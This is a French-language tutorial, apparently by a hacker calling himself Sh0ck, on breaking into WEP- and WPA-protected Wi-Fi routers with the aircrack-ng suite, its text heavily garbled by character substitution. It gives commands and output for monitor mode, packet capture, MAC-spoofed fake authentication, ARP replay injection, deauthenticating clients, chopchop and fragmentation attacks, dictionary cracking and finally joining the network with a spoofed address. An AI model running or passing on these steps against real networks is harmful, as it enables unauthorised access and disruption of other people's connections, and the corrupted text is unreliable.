Anda di halaman 1dari 10

#################################### ### ### ### Man of the Wifi ### ### Aircrack's Audit Tutoriel ### ### By Sh0ck

- shock@k.st ### ### ### ####################################

I - Introduction. II - La ase du !ifi. III - "onctionne#ent de la suite aircrack-n$. I% - La &rati'ue (). % - L'atta'ue *ho& *ho&. %I - L'atta'ue fra$#entation. %II - Aircrack-n$ et Aircrack-&t!. %III - +hase finale du crack W,+. I- - *rack W+A. - - Airoscri&t. S&oon!e& et S&oon!&a. -I - /reet0 to #y friends 1%ery i#&ortant for #e). 2-----------------2 3I - Introduction.3 2-----------------2 4ans ce &a&er. 5ous alle0 a&&rendre 6 5ous ser5ir de la suite aircrack-n$. tout d'a ord. 7e 5ais &arler du c8t9 th9ori'ue de la chose. les #9thodes de #odulation utilis9es. les #9thodes de cry&ta$e. et a&r:s cela. 7e &asserais 6 la &rati'ue 'ui est &our #a &art la &artie la &lus int9ressante. &our'uoi donc &arler de la th9orie ; tout si#&le#ent &arce 'u'une &ersonne en #esure d'auditer un &oint !ifi doit sa5oir un #ini#u# de choses. la ase y co#&ris. &lusieurs lieu< &eu5ent =tre 5uln9ra les. co##e des #acdo. ou des endroits o> il y a eaucou& de ati#ents. Bon co##en?ons (). 2---------------------2 3II - La ase du !ifi.3 2---------------------2 Le !ifi est as9 sur des nor#es. il e<iste 'uatre nor#es 6 ce 7our @

La nor#e A0B.CC @ ,lle utilise co##e ty&e de #odulation. le +SD 1+hase Shift Deyin$) ou le E+SD 1Euadrature +hase Shift Deyin$) 'ui &er#et d'a5oir des d9 its deu< fois &lus 9le59s &ar ra&&ort au +SD. la nor#e A0B.CC &eut atteindre des d9 its de C # Fs 6 CC # Fs. ce 'ui n'est &lus tro& utilis9 de nos 7ours. La nor#e A0B.CCa @ *ontraire#ent 6 la nor#e A0B.CC . cette nor#e utilise la #odulation G"4M 1Grtho$onal "re'uency 4i5ision Multi&le<in$) et &er#et d'a5oir un d9 it de HI # Fs. La nor#e A0B.CC$ @ *o##e la nor#e A0B.CCa. cette nor#e utilise la #odulation G"4M et &er#et d'a5oir un d9 it de HI # Fs. contraire#ent 6 la nor#e A0B.CCa. cette nor#e est &lus a outie donc &lus utilis9e. La nor#e A0B.CCn @ *ette nor#e co#&te re#&lacer le A0B.CC$ car les d9 its seront &lus 9le59s. on &arle de d9 its d'une centaine de # Fs 5oir &lus.

Le !ifi fonctionne 6 une fr9'uence d'en5iron B.I $h0 &our 'uel'ues #illi!atts. &lus on a de 4 i. &lus on &eut ca&ter un si$nal loin. le !ifi co#&orte CI canau< de fr9'uences &lus ou #oins &uissants @ 222222222222222222222 2 *anal 3 "r9'uence 3 2-------------------2 2 C 3 B.ICB 2 2 B 3 B.ICJ 2 2 K 3 B.IBB 2 2 I 3 B.IBJ 2 2 H 3 B.IKB 2 2 L 3 B.IKJ 2 2 J 3 B.IIB 2 2 A 3 B.IIJ 2 2 M 3 B.IHB 2 2 C0 3 B.IHJ 2 2 CC 3 B.ILB 2 2 CB 3 B.ILJ 2 2 CK 3 B.IJB 2 2 CI 3 B.IAI 2 2-------------------2 Ne &ense 'ue ni5eau th9orie. cela 5ous suffira (). 2---------------------------------------------2 3III - "onctionne#ent de la suite aircrack-n$.3 2---------------------------------------------2 Tout d'a ord. la suite aircrack-n$ #arche &ar 9ta&e @ - Acti5ation du #onitor #ode de la carte co#&ati le a5ec air#on-n$ 1il faut un chi&set !ifi co#&ati le a5ec la ca&ture de &a'uets et le fake auth &ar adresse #ac 'ue nous 5errons &lus tard). - *a&ture de &a'uets a5ec airodu#&-n$. - Sti#ulation du r9seau a5ec aire&lay-n$ 1il e<iste &lusieurs atta'ues &our ca&turer encore &lus de &a'uets 'ue nous 5errons 9$ale#ent. il s'a$it de la #9thode cho& cho& et fra$#entation). - *rack de la clef a5ec aircrack-n$. Le ut de la suite aircrack est en fait. de ca&turer les &a'uets en5oy9s sur le r9seau &ar le routeur !ifi $rOce 6 airodu#&-n$ et de d9cry&ter les &a'uets re?us a5ec aircrack-n$ &ar al$orith#e &our une clef !e& ou &ar dictionnaire &our une clef !&a ou !&a-&sk 'ui sont des clefs un &eu &lus s9curis9es. 2--------------------2 3I% - La &rati'ue ().3 2--------------------2 4onc. &our le #o#ent. nous allons &rendre co##e e<e#&le. une clef !ifi en !e& 1CBA its) sur une li5e o< 1'ui dit li5e o<. dit association &ar adresse #ac. ?a co#&li'ue un &eu la chose). 4onc. nous de5ons trou5er la clef !ifi rien 'u'a5ec la suite aircrack-n$. nous allons faire ceci &ar 9ta&es. c'est &arti @ Pous ou5rons donc une console. nous &assons en root et nous faisons ceci @ Q air#on-n$ La liste des interfaces !ifi a&&araRt. #aintenant. nous faisons ceci @

Q air#on-n$ start Sl'interface !ifiS +our #a &art. ?a sera @ Q air#on-n$ start !lan0 N'utiliserais cette interface !ifi durant tout le tutoriel. tache0 donc de la #odifier 6 cha'ue fois &our 5ous. Si 5otre carte !ifi n'est &as d9tect9e dans air#on-n$. il faut l'acti5er @ Q ifconfi$ !lan0 u& Tne fois la carte acti59e et le S#onitor #ode ena ledS. nous &ou5ons continuer a5ec airodu#&-n$. Q airodu#&-n$ --!rite SPo#'ue5ous5oule0S --channel Slechanneldelali5e o<S Sinterface!ifiS +our #a &art. cela sera donc @ Q airodu#&-n$ --!rite tutoriel --channel C !lan0 Si on ne connait &as le channel de la li5e o<. on &eut faire co##e ceci @ Q airodu#&-n$ --!rite tutoriel !lan0 Les cannau< seront analys9s un &ar un 7us'u'6 trou5er la li5e o<. une fois trou59e. il suffit de re$arder la case S*U --S &our connaitre le channel de la li5e o<. Tne fois la li5e o< trou59e. on 5oit la colonne BSSI4. elle corres&ond 6 l'adresse #ac de la li5e o<. La colonne ,SSI4 corres&ond au no# de la li5e o<. +our =tre &lus &r9cis dans la ca&ture. nous &ou5ons relancer airodu#&-n$ co##e ceci @ Q airodu#&-n$ --!rite tutorielB --channel -- -- ssid --@--@--@--@--@-- !lan0 -- ( *orres&ond au nu#9ro du channel 5us dans la case *U. --@--@--@--@--@-- ( *orres&ond 6 l'adresse #ac de la li5e o<. !lan0 ( *orres&ond 6 notre interface !ifi. La colonne #data nous int9resse forte#ent car cela corres&ond au< i5s 'ui nous &er#ettront de cracker la clef a5ec aircrack. ce sont des &etits #orceau< de donn9es en5oy9s &ar la li5e o< et re?us sur notre &c $rOce 6 notre carte !ifi. Maintenant. nous allons sti#uler le r9seau afin de ca&turer encore &lus de &a'uets $rOce 6 aire&lay. *o##e nous atta'uons une li5e o<. elle est &rot9$9e &ar une association &ar adresse #ac. nous allons donc tenter une atta'ue dites S"ake AuthS 'ui a &our ut de 5oler une adresse #ac d976 assi$n9e. Q aire&lay-n$ -C 0 -e ,SSI4 -a BSSI4 -h STATIGP !lan0 -C indi'ue 6 aircrack 'u'on 5eut faire une fake auth. 0 est le te#&s entre deu< tentati5es. ,SSI4 est le no# de la li5e o< 1'ue l'on 5oit dans la colonne ,SSI4 dans airodu#&-n$). BSSI4 est l'adresse #ac de la li5e o< 15oir la colonne BSSI4). STATIGP est l'adresse #ac de la station 15oir colonne STATIGP).

!lan0 est notre interface. ,<e#&le @ Q aire&lay-n$ -C 0 -e Li5e o<-CIM0 -a --@--@--@--@--@-- -h yy@yy@yy@yy@yy@yy !lan0 V ce #o#ent l6. nous de5ons a5oir des #essa$es du $enre @ CJ@HH@KI CJ@HH@KI CJ@HH@KI CJ@HH@KI CJ@HH@KI CJ@HH@KI CJ@HH@KI Sendin$ Authentication We'uest Sendin$ Authentication We'uest Sendin$ Authentication We'uest Sendin$ Authentication We'uest Authentication successful Sendin$ Authentication We'uest Association successful @-)

Le no# re de Sendin$ Authentication We'uest &eut 5arier en fonction de la 'ualit9 du si$nal et de certains facteurs. Maintenant 'ue nous so##es associ9 a5ec le fake auth. on 5a faire une in7ection de &a'uets. c'est la clef &our r9ussir un crack !e& ra&ide#ent. ?a nous 95ite d'y &asser la se#aine &our ca&turer des i5s. sachant 'u'il nous en faut en5iron C 000 000 &our une clef CBA its et K00 000 &our une clef LI its. %oici co##ent &roc9der &our faire une r9in7ection d'ar& @ Q aire&lay-n$ -K -e ,SSI4 BSSI4 -h STATIGP !lan0

V la &lace de -C &our la sti#ulation du r9seau. nous a5ons -K &our la r9in7ection d'AW+. ,<e#&le @ Q aire&lay-n$ -K -e Li5e o<-CIM0 --@--@--@--@--@-- -h yy@yy@yy@yy@yy@yy !lan0

Gn &eut ra7outer aussi le &ara#:tre -< --- 'ui re&r9sente la 5itesse d'in7ection des &a'uets. &ar d9faut. L00 &a'uetsFs. %ous &ou5e0 au$#enter ou di#inuer cette 5aleure en fonction de la 'ualit9 du si$nal #ais 95ite0 d'in7ecter tro& ra&ide#ent. 5ous &ou5e0 faire &lanter l'A+. Maintenant si tout se &asse ien. nous &ou5ons 5oir 'ue dans airodu#&-n$. les i5s au$#entent ainsi 'ue les AW+ ca&tur9s. Si 5ous n'arri5e0 &as 6 ca&turer d'AW+. il e<iste un #oyen. c'est de forcer une station de se d9connecter a5ec aire&lay. *ela ne fonctionne &as tou7ours #ais 5oici la co##ande @ Q aire&lay-n$ -0 C -a --@--@--@--@--@-- -c XX@XX@XX@XX@XX@XX !lan0 -o si$nale 6 aire&lay 'u'on 5eut faire une atta'ue de deauthentication. C corres&ond au< no# res de tentati5es. si on #ets cette 5aleure 6 0. on &roduit une atta'ue en oucle 1&lus efficace). -a corres&ond 6 l'adresse #ac de la li5e o<. -c corres&ond 6 l'adresse #ac 'ue l'on 5eut d9connecter. si on ne #ets &as le &ara#:tre -c dans la co##ande. on d9connecte tout le #onde 1&as tr:s utile sauf dans certains cas). !lan0 corres&ond 6 notre interface. Maintenant. nous allons a&&rendre les deu< autres atta'ues &ossi les 1*ho& cho& et fra$#entation).

2------------------------2 3% - L'atta'ue *ho& *ho&.3 2------------------------2 L'atta'ue *ho& *ho& consiste 6 in7ecter un fau< ar& afin de sti#uler le r9seau donc 6 a5oir des i5s. ceci est utile 'uand une station ne $9n:re &as d'ar&. Toute la th9orie de l'atta'ue *ho& *ho& &eut =tre 5isionn9e ici @ htt&@FF!!!.aircrack-n$.or$Fdoku.&h&;id(cho&cho&theory Maintenant 'ue la th9orie est faite. 5oici la &rati'ue @ Q aire&lay-n$ -I -h yy@yy@yy@yy@yy@yy --@--@--@--@--@-- !lan0

-I si$nale 6 aire&lay 'ue nous 5oulons faire une atta'ue *ho& *ho&. -h yy@yy@yy@yy@yy@yy corres&ond 6 l'adresse #ac de la colonne STATIGP. - --@--@--@--@--@-- corres&ond 6 l'adresse #ac de la li5e o<. !lan0 6 notre interface !ifi. Pous a5ons une r9&onse resse# lante 6 ?a @ 2---------------------------------------------------------------------------2 Wead CLH &ackets... Si0e@ AL. "ro#4S@ C. To4S@ 0 1W,+) BSSI4 ( 00@CI@L*@J,@I0@A0 4est. MA* ( ""@""@""@""@""@"" Source MA* ( 00@I0@"I@JJ@,H@*M 0<0000@ 0<00C0@ 0<00B0@ 0<00K0@ 0<00I0@ 0<00H0@ 0AIB 00I0 eBee dCca CLdI cfe 0000 fIJJ aaIA 0cM IKf IaJB ffff eHcM AKCB Lae ae eIL ffff L0Ka fHMd fadL KeaC ffff dL00 cAc0 fKMI JC0C 00CI 0000 afHf BHMC JBMe LcJe Hfed KddA H fI LHca I0A0 aBBB aHIK BAJK LM0H .B..........lY@. .@.!..Z@....[..S ...U.......[(..* ....7.....\.].1s ..*...^.'.r.e.i. ..Nr."

Tse this &acket ; y 2---------------------------------------------------------------------------2 Pous de5ons donc confir#er a5ec SyS. 2---------------------------------------------------------------------------2 Sa5in$ chosen &acket in re&lay[src-0B0C-CMCLKM.ca& Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset AH AI AK AB AC A0 JM JA JJ JL JH JI JK JB JC J0 LM 1 0\ 1 C\ 1 K\ 1 H\ 1 J\ 1 M\ 1CC\ 1CK\ 1CH\ 1CJ\ 1CM\ 1BC\ 1BK\ 1BH\ 1BL\ 1BA\ 1K0\ done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 <or <or <or <or <or <or <or <or <or <or <or <or <or <or <or <or <or ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( 4K ,B IJ 0J ,B *" 0H LM *A LH M, JB 0C JC AC K, BB 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 &t &t &t &t &t &t &t &t &t &t &t &t &t &t &t &t &t ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( MH HH KH I4 00 00 00 00 00 00 00 00 00 00 00 00 00 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 BHK CLL BCH CLC CB CHB BM CHC BI CBM KL KM CIL AK IK MA CBM fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten in in in in in in in in in in in in in in in in in JL0#s IMA#s LIH#s IAK#s KL#s IHL#s AJ#s IHI#s JC#s KAJ#s C0A#s CCJ#s IKA#s BIM#s CBM#s BMI#s KAJ#s

Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Gffset Sent MHJ

LA 1KB\ done) 3 <or ( A, 3 &t LJ 1KI\ done) 3 <or ( "B 3 &t LL 1KL\ done) 3 <or ( IK 3 &t LH 1KA\ done) 3 <or ( 4I 3 &t LI 1I0\ done) 3 <or ( CL 3 &t LK 1IB\ done) 3 <or ( J" 3 &t LB 1II\ done) 3 <or ( C" 3 &t LC 1IL\ done) 3 <or ( H* 3 &t L0 1IA\ done) 3 <or ( MB 3 &t HM 1H0\ done) 3 <or ( MC 3 &t HA 1HC\ done) 3 <or ( BH 3 &t HJ 1HK\ done) 3 <or ( MI 3 &t HL 1HH\ done) 3 <or ( "K 3 &t HH 1HJ\ done) 3 <or ( 4L 3 &t HI 1HM\ done) 3 <or ( "A 3 &t HK 1LC\ done) 3 <or ( ,A 3 &t HB 1LK\ done) 3 <or ( H4 3 &t HC 1LH\ done) 3 <or ( KK 3 &t H0 1LJ\ done) 3 <or ( ** 3 &t IM 1LM\ done) 3 <or ( 0K 3 &t IA 1JC\ done) 3 <or ( KI 3 &t IJ 1JK\ done) 3 <or ( KI 3 &t IL 1JH\ done) 3 <or ( HC 3 &t IH 1JL\ done) 3 <or ( MA 3 &t II 1JA\ done) 3 <or ( K4 3 &t IK 1A0\ done) 3 <or ( H, 3 &t IB 1AB\ done) 3 <or ( A" 3 &t IC 1AI\ done) 3 <or ( *I 3 &t I0 1AL\ done) 3 <or ( *, 3 &t KM 1AA\ done) 3 <or ( M4 3 &t KA 1M0\ done) 3 <or ( "4 3 &t KJ 1MB\ done) 3 <or ( CK 3 &t KL 1MI\ done) 3 <or ( AK 3 &t KH 1ML\ done) 3 <or ( I, 3 &t &ackets. current $uess@ BM...

( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( ( (

00 00 00 00 00 0* KJ AA *0 00 00 00 00 00 00 0C KJ AA *0 *M ,H JJ "I I0 00 0C 00 0I 0L 00 0A 0C 00 0L

3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3 3

BIA C0H C0C CHA CMJ JB CLL CCM BBM CCK CAI KK CMK CJ AC MH BI B0 MJ CAA IA LI BHK C0M BIB CMI MM CLI LM CKJ BBM BKB CM BK0

fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es fra#es

!ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten !ritten

in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in in

JII#s KCH#s K0K#s IJI#s HMC#s BCJ#s IMJ#s KHJ#s LAJ#s KKM#s HHB#s MM#s HJM#s HC#s BIK#s BAH#s JB#s HM#s BMC#s HLL#s CIB#s CMB#s JHM#s KBJ#s JBL#s HAK#s BML#s IMB#s B0J#s ICC#s LAA#s LMH#s HA#s LAM#s

The A+ a&&ears to dro& &ackets shorter than KH ytes. ,na lin$ standard !orkaround@ AW+ header re-creation. Sa5in$ &lainte<t in re&lay[dec-0B0C-CMCJ0L.ca& Sa5in$ keystrea# in re&lay[dec-0B0C-CMCJ0L.<or *o#&leted in BCs 1B.BM ytesFs) 2---------------------------------------------------------------------------2 Pous a5ons fini. le fichier Sre&lay[dec-0B0C-CMCJ0L.<orS &eut =tre utiliser &our $9n9rer des &a'uets a5ec &acketfor$e-n$. Q &acketfor$e-n$ -M -r in&ut.ca& -y re&lay[dec-0B0C-CMCJ0L.<or -! out&ut.ca& -M -r -y -! si$nale 6 &acketfor$e-n$ 'ue l'on 5eut $9n9rer un &a'uet al9atoire. in&ut.ca& corres&ond au fichier d'entr9e. re&lay[dec-0B0C-CMCJ0L.<or corres&ond 6 notre fichier $9n9r9. out&ut.ca& corres&ond au fichier de sortie.

Il y a &lusieurs #9thodes &our for$er un &a'uet ar&. 5ous &ou5e0 les 5oir ici @ htt&@FF!!!.aircrack-n$.or$Fdoku.&h&;id(&acketfor$e-n$ Pous &ou5ons aussi utiliser l'atta'ue *ho& *ho& sans authentification @ Q aire&lay-n$ -I --@--@--@--@--@-- !lan0

2-----------------------------2

3%I - L'atta'ue fra$#entation.3 2-----------------------------2 *o##e &our l'atta'ue *ho& *ho&. l'atta'ue fra$#entation a &our .<or &our ensuite for$et un &a'uet ar& a5ec &acketfor$e-n$. %oici la co##ande @ Q aire&lay-n$ -H --@--@--@--@--@-- -h yy@yy@yy@yy@yy@yy !lan0 ut de $9n9rer un

-H si$nale 6 aire&lay 'ue nous 5oulons faire une atta'ue fra$#entation. -h yy@yy@yy@yy@yy@yy corres&ond 6 l'adresse #ac de la colonne STATIGP. - --@--@--@--@--@-- corres&ond 6 l'adresse #ac de la li5e o<. !lan0 6 notre interface !ifi. 2----------------------------------2 3%II - Aircrack-n$ et Aircrack-&t!.3 2----------------------------------2 Le ut est d'asse# ler les deu< al$orith#es ense# lent. &our cela. 5oici co##ent faire @ Se #ettre en root et aller dans le r9&ertoire o> se trou5e 5otre .ca& et faire cette co##ande @ Q aircrack-n$ -0 _.ca& -0 sert 6 asse# ler aircrack-n$ et aircrack-&t! ense# lent. _.ca& est 5otre fichier .ca&. il suffit de #odifier _ &ar le no# de 5otre fichier. Si aircrack-n$ arri5e 6 d9cry&ter 5otre .ca&. 5ous de5rie0 o tenir 6 &eu &r:s ceci @

Gu encore ?a @

Gu ceci @

*e sont des i#a$es a&&ro<i#atif. la seule 'ui nous int9resse est le key found a5ec la clef ou le &ass secret.

2---------------------------------2 3%III - +hase finale du crack W,+.3 2---------------------------------2 Tne fois la clef trou59e. il 5ous suffit de chan$er 5otre adresse #ac &ar celle s&oof9e durant le tutoriel @ Q ifconfi$ !lan0 h! ether yy@yy@yy@yy@yy@yy 1We#&lace0 l'interface !lan0 &ar la 5otre et l'adresse #ac &ar celle 'ue 5ous a5e0 utilis9e). Maintenant il faut acti5er dhc& @ Q dhc& !lan0 Maintenant. essaye0 de faire un &in$ sur un site connu co##e $oo$le @ Q &in$ !!!.$oo$le.co# Si 5ous a5e0 des r9&onses. 5ous =tes connect9. ra5o ()

Sinon. l'adresse de la li5e o< n'est &as celle d'ori$ine. dans ce cas. il 5ous faudra utiliser un sniffer r9seau co##e !ireshark. 2---------------2 3I- - *rack W+A.3 2---------------2 Pous allons faire des co##andes asi'ues 5us &lus haut. 5ous &ourre0 les co#&rendre en re$ardant les autres e<e#&les @ Q air#on-n$ start !lan0 Q airodu#&-n$ --!rite crack!&a --channel -- --encry&t !&a !lan0 Maintenant co#&ar9 au crack W,+. le ut n'est &lus de faire une fake auth #ais de faire une d9sauthentification des stations connect9es. Le ut est d'o tenir un Uandshake 1o li$atoire &our lancer l'atta'ue &ar dictionnaire). Q aire&lay-n$ -0 C -a BSSI4 -c STATIGP !lan0 -0 indi'ue 'u'il s'a$it d'une d9sauthentification. C est le no# re de tentati5es. #ettre 0 &our illi#it9. BSSI4 est l'adresse #ac de la colonne BSSI4. STATIGP est l'adresse #ac de la colonne STATIGP 1"acultati5e #ais reco##and9e). A&r:s la d9sauthentification. attende0 'ue le client se reconnecte. 5ous de5rie0 a5oir un Uandshake. &our 59rifier. lance0 aircrack @ Q aircrack-n$ _.ca& Pe re#&lace0 rien dans cette co##ande. Lo$i'ue#ent. 5ous de5rie0 5oir une liste. si dans la cat9$orie S,ncry&tionS 5ous 5oye0 SW+A 1C Uandshake)S. c'est on. on &eut continuer. 4onc. &our d9cry&ter la clef. 5ous a5e0 esoin d'un dictionnaire 1il y en a &leins sur internet). Tne fois 'ue 5ous en a5e0 un. lance0 aircrack co##e ceci @

Q aircrack-n$ -! *he#indudico _.ca& *he#indudico ( %ous de5e0 re#&lacer ?a &ar le che#in du dico. e<e#&le @ 4eskto&F dico. _.ca& ( %ous de5e0 re#&lacer _ &ar le no# de 5otre .ca&. Aircrack se char$era de d9cry&ter la clef #ais 5ous a5e0 le te#&s d'aller dor#ir. en effet. en !&a. le d9cry&ta$e de la clef &eut durer deu< heures co##e deu< 7ours. 2-------------------------------------2 3- - Airoscri&t. S&oon!e& et S&oon!&a.3 2-------------------------------------2 Airoscri&t est un scri&t 'ui utilise la suite aircrack-n$ #ais 'ui facilite eaucou& l'e<&loitation. 5ous &oure0 le trou5er ici @ htt&@FFairoscri&t.aircrack-n$.or$Fdo!nload.ht#l. Tn #anuel est dis&oni le sur le site #=#e si cela reste relati5e#ent si#&le. S&oon!e& et S&oon!&a sont des 9'ui5alents 6 airoscri&t #ais en interface $ra&hi'ue. le #ust en ra&idit9 () %ous &ou5e0 les a5oir ici @ htt&@FFneo5orte<.kodin$s.$oo$le&a$es.co#Fs&oon!e&B.l0# htt&@FFsha#an5irtuel.$oo$le&a$es.co#FSW+A.l0# 2--------------------------2 3-I - /reet0 to #y friends.3 2--------------------------2 -ylitol. D+*W. +U+Li0ardo. &Klo. XeEKuL. iKKJ. `acodo. Best&i$. Master#ind. S&`-TecU. %alus. Uu/e. dH-ro. 4i$ital-U. Dan0aki. Str00en. We sites @ ,uro&a Security. *itec.us.

Anda mungkin juga menyukai